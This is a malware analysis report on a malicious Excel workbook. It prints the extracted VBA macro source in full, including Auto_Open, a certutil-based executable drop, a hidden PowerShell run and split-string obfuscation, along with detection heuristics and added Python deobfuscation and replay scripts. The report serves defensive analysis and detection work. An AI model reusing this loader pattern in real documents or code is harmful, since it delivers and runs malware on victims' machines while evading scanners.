Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 785f7c9516070deb…

MALICIOUS

Office (OLE)

Size: 739.0 KB
Created: 2018-06-29 06:15:07
Authoring application: Microsoft Excel
First seen: 2019-04-18
MD5: ed79d7e4599e2026e36c4b267b75f3c9
SHA-1: a6b6315145a97575ff06bbc125732279dd714505
SHA-256: 785f7c9516070deb785fc9ff369b69729879412129b197e84f99c2d5aed7485e
Risk score: 428

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File; T1140 Deobfuscate/Decode Files or Information

The sample is an Excel workbook whose VBA project contains obfuscated macros with an Auto_Open entry point. Every sensitive string is kept out of the macro source: ProgIDs and API names are split across concatenated literals ("WsCrip" & "t." & "Sh" & "ell", which CreateObject resolves case-insensitively to WScript.Shell) and command lines are assembled character by character with Chr(). Auto_Open runs two chains. The first (LinesOfBusiness.dR8tWCNt) concatenates the text of cells FT3167:FT3253 (column 176, rows 3167 to 3253), wraps it in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines, writes it as a .txt file under a random letter-digit name in the user's Excel AddIns folder (Application.UserLibraryPath), converts it to an .exe with certutil -decode, sleeps two seconds and runs the .exe with Shell. The second (Module1.GgUWAG2c) reads a PowerShell command from cell IL4269 (column 246, row 4269) and runs powershell.exe -nop -noni -windowstyle 1 hidden through WScript.Shell.Run. The executable stage is therefore embedded in the workbook as base64 in cells rather than downloaded; the PowerShell command text is not in the macro source, so whether that stage fetches anything further cannot be determined statically. The heap-spray heuristic matched a run of 0x41 bytes, which in an OLE container is as consistent with padding as with a NOP-style sled; the ClamAV signature and the macro chain carry the verdict.
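
The Chr()/split-literal reassembly described above can be undone statically. The following Python script is an added example, not part of this report or of the sample: it folds VBA concatenation chains into the single literal the macro builds at run time, so the indicators the obfuscation hides (powershell, certutil -decode, WScript.Shell, Scripting.FileSystemObject) become visible to a plain keyword scan without executing the document. The input lines are copied from the extracted macro on this page; values that come from worksheet cells (x, path, expath) are not on the page and stay symbolic.

```python
"""Static deobfuscation of Chr()/split-literal strings in the macro.

Added example, not part of the analysis report or the sample.  Folds
  Chr(112) & Chr(79) & "..."   and   "WsCrip" & "t." & "Sh" & "ell"
into one VBA literal so hidden keywords become greppable.
"""
import re

# One regex, four token kinds.  "other" is a single character so it can never
# swallow a Chr( call or a quote that an earlier alternative should match.
_TOKEN = re.compile(
    r'(?P<lit>"(?:[^"]|"")*")'        # VBA string literal; "" is an escaped quote
    r'|(?P<chr>Chr\((?P<n>\d+)\))'    # Chr(n): one character by code point
    r'|(?P<cat>\s*[&+]\s*)'           # concatenation (& and + both join strings)
    r'|(?P<other>.)',
    re.IGNORECASE,
)

# Strings the macro reassembles; none of them appears verbatim in the source.
INDICATORS = (
    "powershell", "wscript.shell", "scripting.filesystemobject",
    "certutil", "-decode", "-----begin certificate-----",
)


def _quote(s):
    """Render a Python string back as a VBA literal."""
    return '"' + s.replace('"', '""') + '"'


def deobfuscate_line(line):
    """Fold every  literal & literal  pair on one (continuation-joined) line."""
    tokens = []
    for m in _TOKEN.finditer(line):
        if m.group("lit") is not None:
            tokens.append(("lit", m.group("lit")[1:-1].replace('""', '"')))
        elif m.group("chr") is not None:
            tokens.append(("lit", chr(int(m.group("n")))))
        elif m.group("cat") is not None:
            tokens.append(("cat", m.group("cat")))
        else:
            tokens.append(("other", m.group("other")))
    folded = []
    for kind, text in tokens:
        # lit cat lit -> lit; an identifier between literals stops the fold
        if kind == "lit" and len(folded) >= 2 and folded[-1][0] == "cat" and folded[-2][0] == "lit":
            folded.pop()
            _, prev = folded.pop()
            folded.append(("lit", prev + text))
        else:
            folded.append((kind, text))
    return "".join(_quote(t) if k == "lit" else t for k, t in folded)


def deobfuscate(source):
    """Join VBA line continuations (trailing ' _'), then fold each line."""
    joined = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", source)
    return "\n".join(deobfuscate_line(l) for l in joined.split("\n"))


def hidden_indicators(source):
    """Indicators present after folding but absent from the raw source."""
    before = {k for k in INDICATORS if k in source.lower()}
    after = {k for k in INDICATORS if k in deobfuscate(source).lower()}
    return after - before


# Lines copied from the extracted macro on this page (both execution sinks
# and the PEM wrapper); the whole module is not needed to see the effect.
MACRO_EXCERPT = r'''
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run c, 0
'''

if __name__ == "__main__":
    print(deobfuscate(MACRO_EXCERPT))
    print("hidden by obfuscation:", sorted(hidden_indicators(MACRO_EXCERPT)))
```

The fold only merges a literal with an adjacent literal, so a cell-sourced variable such as x or path stays as an identifier in the output and the analyst can see exactly which pieces of the command line are not recoverable from the macro alone. The same token pass is what a keyword scanner should run before matching, which is the gap the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION heuristic above closes by matching the concatenation shape instead.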

Heuristics 10

  • ClamAV: Xls.Malware.Valyria-6735731-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6735731-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
        Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
        Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
        s.Run c, 0
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
        Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
        s.Run c, 0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
        Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
        s.Run c, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found: a 96-byte run at file offsets 0000379B to 000037FA
    Disassembly
    Attempted x86 opcode disassembly (every byte in the run decodes to the same instruction)
    0000379B  41                inc ecx
    0000379C  41                inc ecx
    0000379D  41                inc ecx
    ...                         (92 more identical inc ecx instructions omitted)
    000037FA  41                inc ecx
    Caveat: a run of 'A' bytes disassembles as an inc ecx sled, which is why the heuristic fires, but inside an OLE compound file such a run is equally consistent with filler or padding in a stream, and nothing on this page ties it to a shellcode entry point or an exploit trigger. Treat this finding as weak corroboration; the verdict rests on the ClamAV signature and the macro chain.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3152 bytes
SHA-256: 09b09250c2afb56f15166ea14ea6ae863ff8ee95e1d026b001b74cb08348a4cb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()

    Call LinesOfBusiness.dR8tWCNt

    Call GgUWAG2c

End Sub


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Sub GgUWAG2c()
    Dim x, c As String
    x = GetVal(4269, 4269, 246)
    x = Replace(x, """", "\""")
    c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run c, 0
End Sub



Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function GetRand()
    Dim r As String
    Dim i As Integer
     
    Randomize
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    GetRand = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = Application.UserLibraryPath & rndname & ".txt"
    expath = Application.UserLibraryPath & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    path = Application.UserLibraryPath & GetRand & ".txt"
    expath = Application.UserLibraryPath & GetRand & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub dR8tWCNt()
    Dim p As String
    p = GetVal(3167, 3253, 176)
    cutil (p)
End Sub
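
The LinesOfBusiness chain (GetVal, cutil, GetRand, dR8tWCNt) can be replayed offline to recover the dropped executable and to derive hunting artifacts. The Python script below is an added example, not part of this report or of the sample: it ports the three pieces of the chain that matter to an analyst, namely GetVal (payload assembled from worksheet cells), cutil's PEM wrapper together with an emulation of the certutil -decode step, and GetRand, which names the dropped files. The cell contents are a constructed base64 blob with a fake MZ header, not the sample's payload; against the real workbook the dict of cells would be filled by a cell reader such as xlrd, which is an assumption of this example and not something the report describes.

```python
"""Replay of the certutil drop chain in the LinesOfBusiness module.

Added example, not part of the analysis report or the sample.  Cell
contents below are constructed test data, not the real payload.
"""
import base64
import random
import re


def col_letters(n):
    """1-based Excel column index -> letters, to locate Cells(row, col) in a sheet."""
    s = ""
    while n > 0:
        n, rem = divmod(n - 1, 26)
        s = chr(65 + rem) + s
    return s


def get_val(cells, sr, er, c):
    """Port of GetVal: x = x + Cells(i, c) over rows sr..er.  With text cells
    VBA's + concatenates, so the sheet simply holds the blob in row-sized slices."""
    return "".join(str(cells.get((i, c), "")) for i in range(sr, er + 1))


def wrap_as_certificate(code):
    """The text cutil() writes to <name>.txt (vbNewLine is CRLF)."""
    return ("-----BEGIN CERTIFICATE-----" + "\r\n" + code + "\r\n"
            + "-----END CERTIFICATE-----")


def certutil_decode(text):
    """Emulation of `certutil -decode in out`: ignore the PEM header/footer
    lines and base64-decode the rest.  The macro leans on certutil, a signed
    Windows binary, so no decoder has to live in the macro itself."""
    body = "".join(l.strip() for l in text.splitlines() if not l.startswith("-----"))
    return base64.b64decode(body)


def recover_dropped_exe(cells):
    """What dR8tWCNt -> cutil -> certutil would leave in <name>.exe."""
    return certutil_decode(wrap_as_certificate(get_val(cells, 3167, 3253, 176)))


def get_rand(rnd=random.random):
    """Port of GetRand: eight characters built right-to-left, a digit 1-9 on odd
    steps and an upper-case letter on even steps, so the name always reads
    letter, digit, letter, digit, ... and never contains a 0."""
    r = ""
    for i in range(1, 9):
        if i % 2 == 0:
            r = chr(int((90 - 65 + 1) * rnd() + 65)) + r
        else:
            r = str(int(9 * rnd() + 1)) + r
    return r


# Hunting pattern for the two dropped files.  Application.UserLibraryPath is
# the per-user Excel add-ins folder (normally %APPDATA%\Microsoft\AddIns\).
DROPPED_FILE = re.compile(r"\\Microsoft\\AddIns\\(?:[A-Z][1-9]){4}\.(?:txt|exe)$")


def is_dropped_artifact(path):
    """True for a file path that matches the chain's drop location and naming."""
    return DROPPED_FILE.search(path) is not None


def build_cells(payload, first_row=3167, last_row=3253, col=176):
    """Constructed workbook: base64 of the payload sliced across the same 87
    rows the macro reads (FT3167:FT3253)."""
    b64 = base64.b64encode(payload).decode()
    rows = last_row - first_row + 1
    width = -(-len(b64) // rows)          # ceiling division
    return {(first_row + k, col): b64[k * width:(k + 1) * width] for k in range(rows)}


# Constructed stand-in for the embedded executable: an MZ header plus filler.
FAKE_PAYLOAD = b"MZ" + b"\x00" * 62 + b"constructed test data, not the sample's payload"

if __name__ == "__main__":
    cells = build_cells(FAKE_PAYLOAD)
    exe = recover_dropped_exe(cells)
    print("payload cells:", f"{col_letters(176)}3167:{col_letters(176)}3253")
    print("PowerShell command cell:", f"{col_letters(246)}4269")
    print("recovered", len(exe), "bytes, MZ header:", exe[:2] == b"MZ")
    print("example drop names:", [get_rand() for _ in range(3)])
```

Two practical points follow from the port. First, the embedded stage can be carved and hashed straight from the cells, which gives a second-stage indicator the macro hashes alone do not. Second, the naming regex is strict on purpose: GetRand never emits 0 and always alternates letter and digit, so a hunting query can key on that shape together with the AddIns directory and a .txt/.exe pair created seconds apart by EXCEL.EXE, followed by certutil.exe with -decode; case-fold only the directory part, since the name itself is upper-case by construction.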